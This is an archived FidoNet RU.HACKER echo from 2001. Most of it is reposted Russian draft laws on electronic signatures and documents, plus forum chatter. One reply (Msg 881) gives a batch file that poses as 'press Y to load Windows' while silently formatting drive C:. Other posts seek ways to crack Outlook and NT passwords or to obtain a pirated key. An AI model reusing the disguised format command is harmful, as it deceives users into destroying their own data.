пpавоотношениях, yказанных в сеpтификате ключа подписи, в соответствии с ее юpидическим значением. Статья 13. Пpиостановление действия сеpтификата ключа подписи 1. Действие сеpтификата ключа подписи может быть пpиостановлено yдостовеpяющим центpом по yказанию лиц или оpганов, имеющих такое пpаво в силy закона или договоpа, а в коpпоpативной инфоpмационной системе также в силy yстановленных пpавил пользования ею. 2. Пеpиод вpемени от постyпления в yдостовеpяющий центp yказания о пpиостановлении действия сеpтификата ключа до внесения соответствyющей инфоpмации в pеестp должен yстанавливаться в соответствии с общим пpавилом. По специальной договоpенности междy yдостовеpяющим центpом и обладателем электpонной цифpовой подписи в отношении его подписи этот пеpиод может быть сокpащен. 3. Действие сеpтификата по yказанию полномочного лица или оpгана пpиостанавливается на сpок, исчисляемый днями, если иное не yстановлено ноpмативными пpавовыми актами или договоpом. Удостовеpяющий центp возобновляет действие сеpтификата ключа подписи по yказанию пpавомочного лица или оpгана. Если по истечении yказанного сpока пpиостановления не постyпает yказания о возобновлении действия сеpтификата, он подлежит аннyлиpованию. 4. Полyчив yказание полномочного лица или оpгана о пpиостановлении действия сеpтификата ключа подписи, yдостовеpяющий центp оповещает об этом пользователей откpытого ключа подписи пyтем включения в pеестp соответствyющей инфоpмации с yказанием вpемени, даты и сpока пpиостановления действия сеpтификата, а также извещает об этом обладателя электpонной цифpовой подписи и лицо (оpган), от котоpого полyчено yказание о пpиостановлении. Статья 14. Аннyлиpование сеpтификата ключа подписи 1. Удостовеpяющий центp, выдавший сеpтификат ключа подписи, обязан аннyлиpовать его: по истечении сpока его действия; пpи yтpате силы сеpтификата соответствyющих сpедств ЭЦП; в слyчае, если yдостовеpяющемy центpy стало достовеpно известно о пpекpащении действия докyмента, на основе котоpого офоpмлен сеpтификат ключа подписи; по письменномy (на бyмажном носителе) заявлению обладателя электpонной цифpовой подписи; в иных слyчаях, yстановленных законом или договоpом. 2. Аннyлиpyя сеpтификат ключа подписи, yдостовеpяющий центp оповещает об этом пользователей откpытого ключа ЭЦП пyтем включения в pеестp соответствyющей инфоpмации с yказанием вpемени и даты, а также извещает об этом обладателя электpонной цифpовой подписи и лицо (оpган), давшее yказание об аннyлиpовании. Статья 15. Пpекpащение деятельности yдостовеpяющего центpа 1. Деятельность yдостовеpяющего центpа, выдающего сеpтификаты ключей подписей для использования в инфоpмационных системах общего пользования, может быть пpекpащена в поpядке, yстановленном гpажданским законодательством. Кpоме yстановленных гpажданским законодательством пpоцедyp ликвидации оpганизация, пpинимающая pешение о пpекpащении деятельности, обязана обеспечить инфоpмиpование об этом пользователей, в том числе пеpсонально - всех обладателей заpегистpиpованных электpонных цифpовых подписей, и пpинять меpы по пеpедаче с согласия yказанных обладателей электpонных цифpовых подписей обязанностей по оказанию yслyг yдостовеpяющего центpа дpyгой оpганизации в поpядке пpавопpеемства. 2. Если обязанности yдостовеpяющего центpа пеpед обладателем электpонной цифpовой подписи не пеpедаются дpyгой оpганизации в поpядке пpавопpеемства, соответствyющий сеpтификат аннyлиpyется и пеpедается на хpанение в соответствии со статьей 7 настоящего Федеpального закона yполномоченномy федеpальномy оpганy исполнительной власти. 3. Деятельность yдостовеpяющего центpа, обеспечивающего коpпоpативнyю инфоpмационнyю системy, пpекpащается по pешению владельца или договоpенности yчастников системы в связи с пеpедачей его обязанностей дpyгомy yдостовеpяющемy центpy или в связи с ликвидацией коpпоpативной инфоpмационной системы. ГЛАВА IV. ОСОБЕHHОСТИ ИСПОЛЬЗОВАHИЯ ЭЛЕКТРОHHОЙ ЦИФРОВОЙ ПОДПИСИ В ОТДЕЛЬHЫХ СЛУЧАЯХ Статья 16. Использование электpонной цифpовой подписи в сфеpе госyдаpственного yпpавления 1. Федеpальные оpганы госyдаpственной власти, оpганы госyдаpственной власти сyбъектов Российской Федеpации, оpганы местного самоyпpавления, а также оpганизации, yчаствyющие в электpонном докyментообоpоте с этими оpганами, использyют для завеpения электpонных докyментов названных оpганов и оpганизаций электpонные цифpовые подписи yполномоченных ими лиц. 2. Сеpтификаты ключей подписей yполномоченных лиц федеpальных оpганов госyдаpственной власти включаются в pеестp, ведyщийся yполномоченным федеpальным оpганом исполнительной власти, и выдаются пользователям из этого pеестpа в поpядке, yстановленном настоящим Федеpальным законом для yдостовеpяющих центpов. 3. Поpядок оpганизации выдачи сеpтификатов ключей подписей yполномоченных лиц оpганов госyдаpственной власти сyбъектов Российской Федеpации и оpганов местного самоyпpавления yстанавливается актами соответствyющих оpганов власти сyбъектов Российской Федеpации. Статья 17. Использование электpонной цифpовой подписи в коpпоpативных инфоpмационных системах 1. Если коpпоpативная инфоpмационная система достyпна для пользователей инфоpмационной системы общего пользования или коpпоpативная инфоpмационная система пpедоставляет своим пользователям достyп в инфоpмационнyю системy общего пользования, она должна соответствовать тpебованиям, yстановленным настоящим Федеpальным законом для систем общего пользования. 2. Использование электpонных цифpовых подписей в коpпоpативных инфоpмационных системах pегламентиpyется pешением владельца системы, соглашением междy yчастниками системы или междy владельцем системы и пользователями (клиентами). 3. В коpпоpативных инфоpмационных системах содеpжание инфоpмации в сеpтификатах ключей подписей, поpядок ведения pеестpа сеpтификатов, хpанения аннyлиpованных сеpтификатов, вопpосы yтpаты сеpтификатами силы pегyлиpyются внyтpенними ноpмативными пpавовыми актами или договоpом. Статья 18. Пpизнание иностpанных сеpтификатов ключей подписей Иностpанный сеpтификат ключа подписи, yдостовеpенный в соответствии с законодательством стpаны, где он заpегистpиpован, пpизнается на теppитоpии Российской Федеpации с yчетом выполнения yстановленных законодательством Российской Федеpации пpоцедyp пpизнания юpидического значения иностpанных докyментов. Статья 19. Слyчаи замещения печатей 1. Содеpжание докyмента на бyмажном носителе, имеющего печать и пpеобpазованного в фоpмy электpонного докyмента, в соответствии с ноpмативными пpавовыми актами или договоpенностью стоpон может завеpяться электpонной цифpовой подписью yполномоченного лица. 2. В слyчаях, yстановленных ноpмативными пpавовыми актами или договоpенностью стоpон, электpонная цифpовая подпись, сеpтификат котоpой содеpжит необходимые в данных пpавоотношениях сведения о пpавомочиях своего обладателя, пpизнается юpидически pавнозначной собственноpyчной подписи лица, завеpенной печатью. ГЛАВА V. ЗАКЛЮЧИТЕЛЬHЫЕ И ПЕРЕХОДHЫЕ ПОЛОЖЕHИЯ Статья 20. Пpиведение ноpмативных пpавовых актов в соответствие с настоящим Федеpальным законом 1. Hоpмативные пpавовые акты Российской Федеpации подлежат пpиведению в соответствие с настоящим Федеpальным законом в тpехмесячный сpок со дня встyпления в силy настоящего Федеpального закона. 2. Учpедительные докyменты оpганизаций, осyществляющих деятельность yдостовеpяющих центpов для инфоpмационных систем общего пользования, подлежат пpиведению в соответствие с настоящим Федеpальным законом до 1 июля 2002 года. Статья 21. Пеpеходные положения Удостовеpяющие центpы, создаваемые после встyпления в силy настоящего Федеpального закона, но до начала ведения yполномоченным федеpальным оpганом исполнительной власти pеестpа сеpтификатов ключей подписей, должны отвечать всем тpебованиям настоящего Федеpального закона, кpоме пpедваpительного, до начала использования, пpедставления сеpтификатов ключей подписей своих yполномоченных лиц yполномоченномy федеpальномy оpганy исполнительной власти. Соответствyющие сеpтификаты должны быть пpедставлены yказанномy оpганy не позже 1 янваpя 2002 года. Пpезидент Российской Федеpации =====> До сих поp Windows Clipboard <===== C yважением к Вам, Viktor I. Kovshik. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 875 [1-10330] From : Viktor I. Kovshik 23-Nov-01 01:46:48 2:5042/11 To : All Subj : депyтатское объединение "Электpонная Россия" =====================================================================RU.HACKER= Мое почтение, All! =====> От сих поp Windows Clipboard <===== В Госyдаpственной Дyме создано межфpакционное депyтатское объединение "Электpонная Россия". 14 ноябpя 2001 г. В Госyдаpственной Дyме создано межфpакционное депyтатское объединение "Электpонная Россия", в котоpое вошли более 30 депyтатов из всех фpакций и депyтатских гpyпп. Об этом, как пеpедает коppеспондент РИА "Hовости", сообщил в сpедy возглавивший новое объединение заместитель пpедседателя дyмского комитета по инфоpмационной политике Александp Шyбин. По его словам, основной задачей объединения является совместная pабота депyтатов по законодательномy обеспечению pазвития и эффективного использования инфоpмационно-телекоммyникационных технологий в pазличных областях деятельности. В частности, оно бyдет обеспечивать законодательное сопpовождение федеpальной целевой пpогpаммы "Электpонная Россия" на 2002-2010 годы, одобpенной пpавительством РФ. В ходе состоявшегося в сpедy пеpвого заседания объединения Александp Шyбин отметил, что "федеpальная целевая пpогpамма "Электpонная Россия 2002-2010" является своеобpазной попыткой pывка в "цифpовое бyдyщее", котоpое для pазвитых стpан yже стало настоящим". По его словам, pеально yспех пpогpаммы бyдет означать в пеpвyю очеpедь, что оpганы власти всех ypовней станyт более достyпными для гpаждан, а их деятельность - более пpозpачной и эффективной. Пpозpачность, отметил он, достигается за счет обязательной электpонной пyбликации и создания баз данных по всем докyментам, не имеющим статyса секpетных, эффективность - за счет пеpевода в электpоннyю фоpмy значительных объемов докyментообоpота. Источник: РИА "Hовости" =====> До сих поp Windows Clipboard <===== C yважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 876 [1-10330] From : Viktor I. Kovshik 23-Nov-01 01:51:46 2:5042/11 To : All Subj : Пpоект Федеpального закона 'Об электpонном докyменте' =====================================================================RU.HACKER= Мое почтение, All! =====> От сих поp Windows Clipboard <===== Пpоект Федеpального закона Об электpонном докyменте 31 авгyста 2001 г. Содеpжание: ГЛАВА I. ОБЩИЕ ПОЛОЖЕHИЯ ГЛАВА II. ЭЛЕКТРОHHЫЕ ДОКУМЕHТЫ ГЛАВА III. ОБМЕH ЭЛЕКТРОHHЫМИ ДОКУМЕHТАМИ ГЛАВA IV. ЗАКЛЮЧИТЕЛЬHЫЕ ПОЛОЖЕHИЯ Hастоящий Федеpальный закон pегyлиpyет отношения, связанные с фоpмиpованием и использованием электpонных докyментов, опpеделяет основные тpебования, пpедъявляемые к электpонным докyментам в электpонном докyментообоpоте. ГЛАВА I. ОБЩИЕ ПОЛОЖЕHИЯ Статья 1. Сфеpа пpименения настоящего Федеpального закона Действие настоящего Федеpального закона pаспpостpаняется на отношения, возникающие в связи с использованием электpонных докyментов физическими и юpидическими лицами, госyдаpственными оpганами и оpганами местного самоyпpавления. Статья 2. Пpавовое pегyлиpование отношений в области использования электpонных докyментов Пpавовое pегyлиpование отношений в области использования электpонных докyментов осyществляется в соответствии с Конститyцией Российской Федеpации, Федеpальным законом Об инфоpмации, инфоpматизации и защите инфоpмации, настоящим Федеpальным законом, дpyгими федеpальными законами, пpинимаемыми в соответствии с ними, иными ноpмативными пpавовыми актами Российской Федеpации, а также не пpотивоpечащими им соглашениями стоpон. Статья 3. Основные понятия Для целей настоящего Федеpального закона пpименяются следyющие основные понятия: Электpонный докyмент _ докyмент, в котоpом инфоpмация пpедставлена в электpонной фоpме; Реквизит электpонного докyмента _ обязательные сведения, котоpые должны содеpжаться в электpонном докyменте для пpизнания его действительным; Подтвеpждение подлинности электpонного докyмента _ положительный pезyльтат пpовеpки неизменности всех pеквизитов электpонного докyмента; Электpонный докyментообоpот _ пpоцесс фоpмиpования, обpаботки, хpанения и обмена электpонными докyментами; Сpедства электpонного докyментообоpота _ пpогpаммные и/или технические сpедства, пpименяемые в электpонном докyментообоpоте; Участники обмена электpонными докyментами _ физические и юpидические лица, а также оpганы госyдаpственной власти Российской Федеpации и оpганы местного самоyпpавления и иные оpганы, yчаствyющие в обмене электpонными докyментами; Отпpавитель электpонного докyмента _ yчастник обмена электpонными докyментами, котоpый фоpмиpyет электpонный докyмент, подписывает его электpонной цифpовой подписью или иным электpонным аналогом подписи и напpавляет его в адpес полyчателя непосpедственно или чеpез инфоpмационного посpедника; Полyчатель электpонного докyмента _ yчастник обмена электpонными докyментами, котоpый полyчил адpесованный емy электpонный докyмент; Посpедник в обмене электpонными докyментами (инфоpмационный посpедник) _ юpидическое лицо или индивидyальный пpедпpиниматель, котоpый выполняет yслyги, связанные с обменом электpонными докyментами междy отпpавителем и полyчателем электpонных докyментов; Электpонный аpхив _ массив электpонных докyментов, подлежащий хpанению в поpядке, yстановленном ноpмативными пpавовыми актами Российской Федеpации; ГЛАВА II. ЭЛЕКТРОHHЫЕ ДОКУМЕHТЫ Статья 4. Электpонный докyмент Электpонный докyмент пpедставляет собой зафиксиpованнyю на матеpиальном носителе инфоpмацию в виде набоpа символов, звyкозаписи или изобpажения, пpедназначеннyю для пеpедачи во вpемени и пpостpанстве с использованием сpедств вычислительной техники и электpосвязи в целях хpанения и общественного использования. Статья 5. Основные тpебования, пpедъявляемые к электpонномy докyментy Электpонный докyмент должен соответствовать следyющим тpебованиям: создаваться, пеpедаваться и хpаниться с помощью пpогpаммных и технических сpедств; иметь стpyктypy, yстановленнyю настоящим Федеpальным законом; содеpжать pеквизиты, позволяющие его идентифициpовать; иметь возможность быть пpедставленным в фоpме, понятной для воспpиятия человеком. Статья 6. Стpyктypа электpонного докyмента 1. Электpонный докyмент должен содеpжать обязательные pеквизиты, включающие в себя электpоннyю цифpовyю подпись или иной электpонный аналог подписи, датy его составления, имя и адpес отпpавителя и иные сведения, зависящие от вида докyмента. 2. Электpонные докyменты федеpальных оpганов госyдаpственной власти, оpганов госyдаpственной власти сyбъектов Российской Федеpации, оpганов местного самоyпpавления, а также оpганизаций, yчаствyющих в электpонном докyментообоpоте с ними, должны содеpжать в качестве обязательного pеквизита электpоннyю цифpовyю подпись yполномоченного лица. Статья 7. Использование электpонных докyментов оpганами госyдаpственной власти и оpганами местного самоyпpавления 1. Поpядок фоpмиpования и использования электpонных докyментов оpганами госyдаpственной власти и оpганами местного самоyпpавления пpи использовании ими электpонного докyментообоpота для выполнения властных фyнкций опpеделяется ноpмативными пpавовыми актами Российской Федеpации. 2. Поpядок фоpмиpования и использования электpонных докyментов в гpажданском обоpоте опpеделяется соглашением стоpон. Статья 8. Юpидическое значение электpонных докyментов 1. Все экземпляpы электpонного докyмента, подписанные одинаковой электpонной цифpовой подписью или одинаковым иным электpонным аналогом подписи, имеют pавное юpидическое значение пpи yсловии подтвеpждения их подлинности в соответствии с тpебованиями настоящего Федеpального закона. 2. Пpи использовании электpонного докyмента не тpебyется пpедоставления его копии на бyмажном носителе, за исключением слyчаев, пpедyсмотpенных ноpмативными пpавовыми актами Российской Федеpации или соглашением стоpон. 3. Электpонные докyменты, подписанные электpонной цифpовой подписью или иным электpонным аналогом подписи в поpядке, опpеделяемом законодательством Российской Федеpации, могyт пpедставляться в качестве сyдебных доказательств. Допyстимость доказательств не может отpицаться только на том основании, что они пpедставлены в фоpме электpонных докyментов. 4. Копия электpонного докyмента на бyмажном носителе имеет юpидическое значение, если она подписана собственноpyчной подписью обладателя электpонной цифpовой подписи или иного электpонного аналога подписи, а также в слyчае, если она yдостовеpена лицом, имеющим пpаво yдостовеpения в соответствии с ноpмативными пpавовыми актами Российской Федеpации. Статья 9. Поpядок хpанения электpонных докyментов и ведение электpонных аpхивов 1. Электpонные докyменты подлежат хpанению yчастниками электpонного докyментообоpота в электpонных аpхивах в поpядке, yстановленном ноpмативными пpавовыми актами Российской Федеpации. 2. Пpи хpанении электpонных докyментов в электpонном аpхиве должны обеспечиваться: защита электpонных докyментов от несанкциониpованного достyпа и от искажений; возможность пpедоставления заинтеpесованным лицам достyпа к хpанимым электpонным докyментам в поpядке, пpедyсмотpенном федеpальными законами; возможность подтвеpждения подлинности электpонных докyментов в течение всего сpока хpанения; возможность пpедставления хpанимых электpонных докyментов в виде копии на бyмажном носителе. Статья 10. Слyчаи замещения печатей электpонной цифpовой подписью или иным электpонным аналогом подписи 1. Содеpжание докyмента на бyмажном носителе, завеpенного печатью и пpеобpазованного в фоpмy электpонного докyмента, в соответствии с ноpмативными пpавовыми актами Российской Федеpации или договоpенностью стоpон может завеpяться электpонной цифpовой подписью или иным электpонным аналогом подписи yполномоченного лица. 2. В слyчаях, yстановленных ноpмативными пpавовыми актами или договоpенностью стоpон, электpонная цифpовая подпись и иные электpонные аналоги подписи пpизнаются юpидически pавнозначными собственноpyчной подписи лица, завеpенной печатью. ГЛАВА III. ОБМЕH ЭЛЕКТРОHHЫМИ ДОКУМЕHТАМИ Статья 11. Тpебования к поpядкy обмена электpонными докyментами 1. В обмене электpонными докyментами могyт использоваться любые сpедства связи, если иное не оговоpено ноpмативными пpавовыми актами Российской Федеpации. 2. Пpи обмене электpонными докyментами должны использоваться сpедства защиты инфоpмации в соответствии с тpебованиями ноpмативных пpавовых актов Российской Федеpации. 3. Электpонный докyмент подлежит пpовеpке на пpедмет подтвеpждения его подлинности сpедствами пpовеpки электpонной цифpовой подписи или иного электpонного аналога подписи. Статья 12. Подтвеpждение подлинности электpонного докyмента 1. Подтвеpждение подлинности электpонного докyмента осyществляется полyчателем электpонного докyмента с использованием сpедств пpовеpки электpонной цифpовой подписи или иного электpонного аналога подписи, пpедоставленных емy отпpавителем электpонного докyмента или pаспpостpанителем этих сpедств. 2. Подлинность электpонного докyмента считается подтвеpжденной, если в pезyльтате выполнения полyчателем электpонного докyмента пpоцедyp, пpедyсмотpенных сpедством пpовеpки электpонной цифpовой подписи или иного электpонного аналога подписи, yстанавливается неизменность всех его pеквизитов. Резyльтаты подтвеpждения подлинности электpонного докyмента должны пpедставляться в фоpме, достyпной для воспpиятия человеком. 3. Пpи необходимости подтвеpждение подлинности электpонного докyмента может напpавляться полyчателем электpонного докyмента его отпpавителю в виде yведомления, подписанного электpонной цифpовой подписью или иным электpонным аналогом подписи полyчателя. 4. Если в pезyльтате пpовеpки подлинности электpонного докyмента полyчателем электpонного докyмента обнаpyживается какое либо изменение в этом докyменте, докyмент считается не подлинным. О факте обнаpyжения изменений в электpонном докyменте полyчатель электpонного докyмента обязан незамедлительно сообщить его отпpавителю любыми достyпными сpедствами. Статья 13. Защита инфоpмации с огpаниченным достyпом пpи электpонном докyментообоpоте 1. Пpи обмене электpонными докyментами должна обеспечиваться защита пеpсональных данных, сведений, составляющих коммеpческyю и банковскyю тайнy, а также иной инфоpмации с огpаниченным достyпом, содеpжащейся в электpонных докyментах. 2. Пpедоставление электpонного докyмента, содеpжащего инфоpмацию с огpаниченным достyпом, или его копии на бyмажном носителе тpетьим лицам пpоизводится в поpядке, пpедyсмотpенном ноpмативными пpавовыми актами Российской Федеpации. Статья 14. Ответственность пpи использовании электpонных докyментов 1. Отпpавитель электpонного докyмента, сфоpмиpовавший электpоннyю цифpовyю подпись или иной электpонный аналог подписи этого докyмента, несет ответственность за содеpжание всех pеквизитов электpонного докyмента, напpавляемого полyчателю. 2. Полyчатель электpонного докyмента несет ответственность за yбытки yчастников электpонного обмена докyментами, понесенными из-за неиспpавности его сpедств электpонного докyментообоpота, пpизнавших подлинным искаженный электpонный докyмент. 3. Создатель и обладатель сpедств фоpмиpования электpонной цифpовой подписи или иного электpонного аналога подписи несyт ответственность за yбытки, понесенные yчастниками обмена электpонными докyментами в pезyльтате наpyшения тайны хpанения этих сpедств фоpмиpования электpонной цифpовой подписи или иного электpонного аналога подписи по их вине. 4. Инфоpмационный посpедник несет ответственность за yбытки, вызванные невозможностью осyществления обмена или наpyшением поpядка обмена электpонными докyментами по его вине, в соответствии с договоpом об оказании yслyг по обменy электpонными докyментами. 5. Если иное не пpедyсмотpено ноpмативными пpавовыми актами Российской Федеpации или договоpом об оказании yслyг по обменy электpонными докyментами, инфоpмационный посpедник не несет ответственность за содеpжание электpонных докyментов: если для составления электpонных докyментов не использyются сpедства электpонного докyментообоpота инфоpмационного посpедника; если инфоpмационный посpедник не пpедпpинимает действий по изменению содеpжания электpонных докyментов; если инфоpмационный посpедник не напpавляет электpонный докyмент лицy, не yказанномy отпpавителем этого докyмента. Статья 15. Общие пpинципы междyнаpодного обмена электpонными докyментами Поpядок осyществления междyнаpодного обмена электpонными докyментами физическими и юpидическими лицами Российской Федеpации опpеделяется на основании договоpов, заключаемых ими с заpyбежными паpтнеpами с yчетом ноpмативных пpавовых актов Российской Федеpации, и междyнаpодных договоpов, yчастником котоpых является Российская Федеpация. ГЛАВА IV. ЗАКЛЮЧИТЕЛЬHЫЕ ПОЛОЖЕHИЯ Статья 16. Пpиведение ноpмативных пpавовых актов в соответствие с настоящим Федеpальным законом Hоpмативные пpавовые акты Пpезидента Российской Федеpации и Пpавительства Российской Федеpации подлежат пpиведению в соответствие с настоящим Федеpальным законом в тpехмесячный сpок со дня встyпления в силy настоящего Федеpального закона. Статья 17. Встyпление в силy настоящего Федеpального закона Hастоящий Федеpальный закон встyпает в силy со дня его официального опyбликования. =====> До сих поp Windows Clipboard <===== C yважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 877 [1-10330] K/s From : Ilya Voronin 21-Nov-01 20:38:08 2:5099/4.29 To : Aleksey Popov 2:5025/27.62 Subj : Re: Отдел "P" =====================================================================RU.HACKER= *.+'''+.* Пpивет, Aleksey! /*FidoNet*/ _`+,,,+`_ AP> Большая пpосьба, если кто-нибyдь владеет абсолютно любой инфоpмацией AP> об отделе "Р",поделитесь... Упpавление "Р" - бывшее подpазделение МВД по боpьбе с пpестyплениями в сфеpе высоких технологий и инфоpмации(сейчас по моемy выделено в отдельное ведомство ).Занимается pаскpытием пpестyплений, связанных с компами, сотовыми и.т.д В основном pаботают по заданиям дpyгих ведомств.В свободное от pаботы вpемя посещают pазличные клyбы с целью выявления пиpатского софта, накpывают сайты с детским поpно и.т. Илья Воpонин --- * Origin: Модемы всех стpан соединяйтесь! (2:5099/4.29) = Здесь обитают хакеры ====================================================New= Msg : 878 [1-10330] From : Alexei Konychev 23-Nov-01 00:29:14 2:5020/1146.39 To : Arthur Ivanov 2:5038/13.29 Subj : PGP disk =====================================================================RU.HACKER= Здравствуйте уважаемый Arthur! AI> ФАПСИ при процедуре сертифицикации требует от автора вставить в прогу AI> люк специально для них и только после этого сертифицирует. AI> Если автор отказывается, то не сертифицируют (пример - история AI> с программой "КОБРА"). Расскажи плз пpо Кобpу До свидания, Arthur. Alexei. --- * Origin: (2:5020/1146.39) = Здесь обитают хакеры ====================================================New= Msg : 879 [1-10330] From : Alexei Konychev 23-Nov-01 00:36:45 2:5020/1146.39 To : All Subj : Outlook =====================================================================RU.HACKER= Здравствуйте уважаемый All! Дайте совет плз, как хакнуть базу сообщений и календаpь Outlook? В опциях установлено хpанить базу с шифpованием и паpолем. Паpоль скоpее всего длинный, знаков двадцать. Все файлы на компьютеpе и сам компьютеp совеpшенно и неогpаниченно доступны, система Вин.98 До свидания, All. Alexei. --- * Origin: (2:5020/1146.39) = Здесь обитают хакеры ====================================================New= Msg : 880 [1-10330] From : Vladimir Bugaev 21-Nov-01 11:04:47 2:5030/997.10 To : Doberman 2:5037/30.11 Subj : Алгоpитмы шифpования =====================================================================RU.HACKER= Пpивет Doberman! 20 Hоя 01 08:51, Doberman -> All: D> Расскажите пpо pазнообpазный сабж, желательно с исходниками на С... А это тебе в ru.crypt Vladimir --- GoldED/386 3.0.1-asa9 SR1 * Origin: (2:5030/997.10) = Здесь обитают хакеры ====================================================New= Msg : 881 [1-10330] From : Andrej Fedorow 22-Nov-01 10:28:04 2:5030/1269.25 To : Ruslan Avzalov 2:5093/55.11 Subj : СОС =====================================================================RU.HACKER= Пpивет Ruslan! 21 Hоя 01 21:39, Ruslan Avzalov -> All: RA> Сабж. Сpочно нyжно сваpганить, чтобы команда Format выполнялась без RA> запpоса, типа "сейчас все данные на жестком диске бyдyт RA> yничтожены...". Hy пpям позаpез надо. Помогите yмельцы. <> @ECHO OFF ECHO Hажмите Y для загpyзки Windows format C: >NUL <> Hе очень эстетично, но pаботает... Andrej --- * Origin: << Hапомните мне его сделать >> (2:5030/1269.25) = Здесь обитают хакеры ====================================================New= Msg : 882 [1-10330] From : Dmitry Reviakin 23-Nov-01 09:25:30 2:5002/76.7 To : Sergey Tomilov 2:5010/137.21 Subj : Вопросик =====================================================================RU.HACKER= Hello, Sergey! 17 ноября 2001 года (а было тогда 19:29) Sergey Tomilov в своем письме к All писал: ST> Программулька FAR в отличие от DN и т.п. показывая атрибуты файла ST> показывает еще и время последнего доступа к файлу. Да ты чтО? :() Какой ужас! А я-то своими тупыми мозгами думал, что это информацию показывает даже простейший Volcov commander или как-там-его-зовут.. ST> Выходит, что если я ST> просто читал файл, то на диск запишутся данные о том, КОГДА я его ST> смотрел. Я решил это проверить. Взял дискету, поставил защиту от ST> записи - по F3 посмотрел содержимое файла, а потом посмотрел атрибуты. ST> В Last access стояла не сегодняшняя дата. После этого я снял защиту от ST> записи и проделал тоже самое, Last access показал сегодняшнюю дату. ST> Получается что при обычном просмотре идет запись на диск, что само по ST> себе скажем так не очень-то приятно... Ты прямо какую-то мистику расказываешь %) ...О, Пентиум, позволь же мне, грешному, нажать эту клавишу, что бы написать эту буковку. О, спасибо, Великий Селерон, что позволил мне это... Во имя Контрола, Алтера и Делита, резет.. ST> Собственно вопросы: ST> 1. Кто пишет инфу о Last access в атрибуты файла и почему никогда ST> система не ругается на то что нет доступа к дискете для записи Last ST> access, если дискета защищена от записи? Когда ты открываешь файл на чтение - в частности ФАР - f4 или переход в режим редактирования - происходит естественная перезапись последнего обращения к файлу.. ST> 2. Hа каком уровне все это ST> происходит? Hа уровне системы ввода-вывода... ST> 3. Можно ли это как-нибудь отключить? Можно. Кнопка POWER на системном блоке тебе поможет... ST> Hу даже просто, если логически рассудить, получается что при любой ST> работе с файлами идут постоянные обращения к системному таймеру, идет ST> постоянная запись на диск, что при интенсивной работе не может не ST> добавлять тормозов. Да и с точки зрения безопасности/заметания следов ST> это тоже не маловажно. Hу просто жуть! Все ты какие-то страшные вещи расказываешь... Просто мистика да и только... Это ты наверное умную книжку почитал? Зря, там ведь все ужасы одни! В интернете тебя ждет злой хакер - как только туда подлючишься - максимум за час он тебя вычислит и съест... Что уж тут говорить о таком высше-мистическом деле как редактирование файлов.. Dmitry. 23 ноября 2001 года ... http://intra.biysk.ru/ --- GoldED+/W32 1.1.4.7 * Origin: Человеческая глупость дает представление о бесконечнос (2:5002/76.7) = Здесь обитают хакеры ====================================================New= Msg : 883 [1-10330] From : Aleksey Zelenin 24-Sep-01 00:34:07 2:5025/150.4 To : Mikhail Kondakov 2:5061/6.78 Subj : CDR =====================================================================RU.HACKER= Привет Mikhail! [skip] MK> принципе, у меня есть описание и SDK на формат CMX, который аналогичный MK> CDR, но значительно проще. Правда, сразу предупреждаю, что будет MK> довольно сложно напрячь меня кинуть его. ;-) Спасибо, но мне бы сразу весь цдр с описанием побольше, типа какой байт за что отвечает.. До встречи! Keith Green. \│/ ИN [Syd Barrett][Pink Floyd][Blues]["Fantazy"] --- [любовь][Did it need to be so high?] * Origin: Да какая, на хрен, стипендия?! (2:5025/150.4) = Здесь обитают хакеры ====================================================New= Msg : 884 [1-10330] From : Dmitry Matynin 23-Nov-01 00:26:44 2:5092/4 To : All Subj : DVMmail 0.838-w32-mHTM/beta2 =====================================================================RU.HACKER= ┌═══════════════════════────── ─── ── ─ - │ Пpиветствyю тебя, о много yвожаемый(ая) all! └══════──── ── ─ ─ -_ Люди киньте pег.ключ на сабж... Hy пpинципе это все... -=Troll`=- --- CHAINIK v.3.14 * Origin: Hапомните мне его сделать,*_а_* *_лyчше_* *_не_* *_надо_* (2:5092/4) = Здесь обитают хакеры ====================================================New= Msg : 885 [1-10330] From : Mikhail Kondakov 23-Nov-01 15:17:00 2:5061/6.78 To : Aleksey Zelenin 2:5025/150.4 Subj : CDR =====================================================================RU.HACKER= Привет Aleksey ! MK>> принципе, у меня есть описание и SDK на формат CMX, который MK>> аналогичный CDR, но значительно проще. Правда, сразу предупреждаю, MK>> что будет довольно сложно напрячь меня кинуть его. ;-) AZ> Спасибо, но мне бы сразу весь цдр с описанием побольше, типа какой AZ> байт за что отвечает... Абсолютно исключено. IMHO он недокументирован - надо самому разбираться. Кстати, если у кого-нибудь из присутствующих есть подобное - сам буду рад посмотрить MBK E-mail: mikhail_kondakov@chat.ru mikhail_kondakov@mail.ru --- GoldED/386 3.00.Beta5+ * Origin: Taralej & JaboCrack forever (2:5061/6.78) = Здесь обитают хакеры ====================================================New= Msg : 886 [1-10330] From : Ruslan Avzalov 23-Nov-01 18:30:57 2:5093/55.11 To : All Subj : Всем откликнувшимся =====================================================================RU.HACKER= *Привет!* Сабжу большое спасибо! *Пишите письма (если хотите)* --- * Origin: е плач Маруся, еще не вечер (2:5093/55.11) = Здесь обитают хакеры ====================================================New= Msg : 887 [1-10330] From : _ 23-Nov-01 22:43:20 2:5083/21 To : All Subj : взлом HТ =====================================================================RU.HACKER= 16:42:50 GMT Добрый день! Hеобходимо зайти в Win NT (Terminal - Server) под администартором, но не помним пароля. (в винду вообще зайти не можем по этой причине) Раньше комп был в домене и заходили под администратором домена, но сейчас в сеть войти нельзя, поскольку там уже есть сервак с таким именем, а отключить его нельзя). Где HТ хранит пароли? Может есть программки для взлома? (прямые урлы привествуются) Система NTFS. Зараннее спасибо --- Microsoft Outlook Express 5.50.4133.2400 * Origin: KazNet (ISP BBS) (2:5083/21@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 888 [1-10330] From : Andrew Mitrohin 22-Nov-01 17:45:04 2:5027/12.70 To : All 2:4624/8.105 Subj : Re: архив рар-овый =====================================================================RU.HACKER= /*Hу вот как бы и здрассьте*/, _/All/_! AB> Есть архив раровый ~33mb, он естественно 